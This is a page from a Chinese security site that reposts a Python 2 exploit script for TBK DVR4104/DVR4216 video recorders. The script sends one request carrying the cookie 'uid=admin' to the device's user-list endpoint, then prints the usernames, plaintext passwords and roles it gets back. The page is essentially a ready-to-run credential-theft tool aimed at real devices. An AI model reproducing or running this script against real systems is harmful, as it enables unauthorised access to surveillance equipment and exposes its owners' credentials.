首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TBK DVR4104 / DVR4216 - Credentials Leak
来源:@capitan_alfa 作者:ezelf 发布时间:2018-05-03  
# -*- coding: utf-8 -*-
import json
import requests
import argparse
import tableprint as tp
 
class Colors:
    BLUE        = '\033[94m'
    GREEN       = '\033[32m'
    RED         = '\033[0;31m'
    DEFAULT     = '\033[0m'
    ORANGE      = '\033[33m'
    WHITE       = '\033[97m'
    BOLD        = '\033[1m'
    BR_COLOUR   = '\033[1;37;40m'
 
banner = '''
                             __..--.._
      .....              .--~  .....  `.
    .":    "`-..  .    .' ..-'"    :". `
    ` `._ ` _.'`"(     `-"'`._ ' _.' '
         ~~~      `.          ~~~
                  .'
                 /
                (
                 ^---'
 
 
 [*] @capitan_alfa
'''
 
details = '''
 # Exploit Title:   DVRs; Credentials Exposed
 # Date:            09/04/2018
 # Exploit Author:  Fernandez Ezequiel ( @capitan_alfa )
'''
parser = argparse.ArgumentParser(prog='getDVR_Credentials.py',
                                description=' [+] Obtaining Exposed credentials',
                                epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81',
                                version="1.1")
 
parser.add_argument('--host',   dest="HOST",    help='Host',    required=True)
parser.add_argument('--port',   dest="PORT",    help='Port',    default=80)
 
args    =   parser.parse_args()
 
HST     =   args.HOST
port    =   args.PORT
 
headers = {}
 
fullHost_1  =   "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list"
host        =   "http://"+HST+":"+str(port)+"/"
 
print Colors.GREEN+banner+Colors.DEFAULT
 
 
def makeReqHeaders(xCookie):
    headers["Host"]             =  host
    headers["User-Agent"]       = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)"
    headers["Accept"]           = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
    headers["Accept-Languag"]   = "es-AR,en-US;q=0.7,en;q=0.3"
    headers["Connection"]       = "close"
    headers["Content-Type"]     = "text/html"
    headers["Cookie"]           = "uid="+xCookie
    
    return headers
 
try:
    rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000)
except Exception,e:
    print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT
    exit()
 
badJson = rX.text
try:
    dataJson = json.loads(badJson)
    totUsr = len(dataJson["list"])   #--> 10
except Exception, e:
    print " [+] Error: "+str(e)
    print " [>] json: "+str(rX)
#    print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin"))
    exit()
 
 
print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN
print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT
 
print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT
print " "
 
final_data = []
try:
    for obj in range(0,totUsr):
 
        temp = []
 
        _usuario    = dataJson["list"][obj]["uid"]
        _password   = dataJson["list"][obj]["pwd"]
        _role       = dataJson["list"][obj]["role"]
 
        temp.append(_usuario)
        temp.append(_password)
        temp.append(_role)
 
        final_data.append(temp)
 
        hdUsr  = Colors.GREEN + "Username" + Colors.DEFAULT
        hdPass = Colors.GREEN + "Password" + Colors.DEFAULT
        hdRole = Colors.GREEN + "Role ID"  + Colors.DEFAULT
 
        cabeceras = [hdUsr, hdPass, hdRole]
 
    tp.table(final_data, cabeceras, width=20)
 
except Exception, e:
    print "\n [!]: "+str(e)
    print " [+] "+ str(dataJson)
 
print "\n"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GPON Routers - Authentication
·Linux Kernel < 4.17-rc1 - 'AF_
·Adobe Reader PDF - Client Side
·Windows - Local Privilege Esca
·Schneider Electric InduSoft We
·Windows WMI - Recieve Notifica
·Exim < 4.90.1 - 'base64d' Remo
·DeviceLock Plug and Play Audit
·Metasploit Framework - 'msfd'
·HWiNFO 5.82-3410 - Denial of S
·Metasploit Framework - 'msfd'
·WordPress Plugin User Role Edi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved